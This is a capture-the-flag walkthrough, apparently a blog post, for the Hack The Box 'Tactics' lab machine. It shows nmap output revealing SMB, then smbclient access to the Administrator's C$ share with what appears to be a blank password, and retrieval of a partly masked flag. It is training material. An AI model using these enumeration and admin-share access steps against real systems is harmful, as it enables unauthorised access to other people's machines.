HTB Tactics

$ nmap -v -Pn 10.129.251.21

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 10:01 CEST
Initiating Parallel DNS resolution of 1 host. at 10:01
Completed Parallel DNS resolution of 1 host. at 10:01, 0.04s elapsed
Initiating Connect Scan at 10:01
Scanning 10.129.251.21 [1000 ports]
Discovered open port 139/tcp on 10.129.251.21
Discovered open port 135/tcp on 10.129.251.21
Discovered open port 445/tcp on 10.129.251.21
Completed Connect Scan at 10:01, 6.81s elapsed (1000 total ports)
Nmap scan report for 10.129.251.21
Host is up (0.045s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds

We can see, that box has SMB enabled on port 445.
SMB stand for Server message block.

$ smbclient -L 10.129.251.21

Password for [WORKGROUP\ruben]:
session setup failed: NT_STATUS_ACCESS_DENIED

if we don’t add a -U parameter, the smbclient request will be performed using the current user.

So, the only user we currently know that the box will contain is the Administrator, so we can use it.

$ smbclient -L 10.129.251.21 -U Administrator

Password for [WORKGROUP\Administrator]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.251.21 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

$ smbclient \\\\10.129.251.21\\C$ -U Administrator

Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \>

smb: > dir

 $Recycle.Bin                      DHS        0  Wed Apr 21 17:23:49 2021
 Config.Msi                        DHS        0  Wed Jul  7 20:04:56 2021
 Documents and Settings          DHSrn        0  Wed Apr 21 17:17:12 2021
 pagefile.sys                      AHS 738197504  Sun Jul 10 09:59:15 2022
 PerfLogs                            D        0  Sat Sep 15 09:19:00 2018
 Program Files                      DR        0  Wed Jul  7 20:04:24 2021
 Program Files (x86)                 D        0  Wed Jul  7 20:03:38 2021
 ProgramData                        DH        0  Wed Apr 21 17:31:48 2021
 Recovery                         DHSn        0  Wed Apr 21 17:17:15 2021
 System Volume Information         DHS        0  Wed Apr 21 17:34:04 2021
 Users                              DR        0  Wed Apr 21 17:23:18 2021
 Windows                             D        0  Wed Jul  7 20:05:23 2021

3774463 blocks of size 4096. 1156936 blocks available

smb: > cd Users
smb: \Users> dir

  .                                  DR        0  Wed Apr 21 17:23:18 2021
  ..                                 DR        0  Wed Apr 21 17:23:18 2021
  Administrator                       D        0  Wed Apr 21 17:23:32 2021
  All Users                       DHSrn        0  Sat Sep 15 09:28:48 2018
  Default                           DHR        0  Wed Apr 21 17:17:12 2021
  Default User                    DHSrn        0  Sat Sep 15 09:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 09:16:48 2018
  Public                             DR        0  Wed Apr 21 17:23:31 2021

3774463 blocks of size 4096. 1156410 blocks available
smb: \Users\> cd Administrator

smb: \Users\Administrator> cd Desktop
smb: \Users\Administrator\Desktop> get flag.txt

getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec)

smb: \Users\Administrator\Desktop> exit
$ cat flag.txt

f751XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *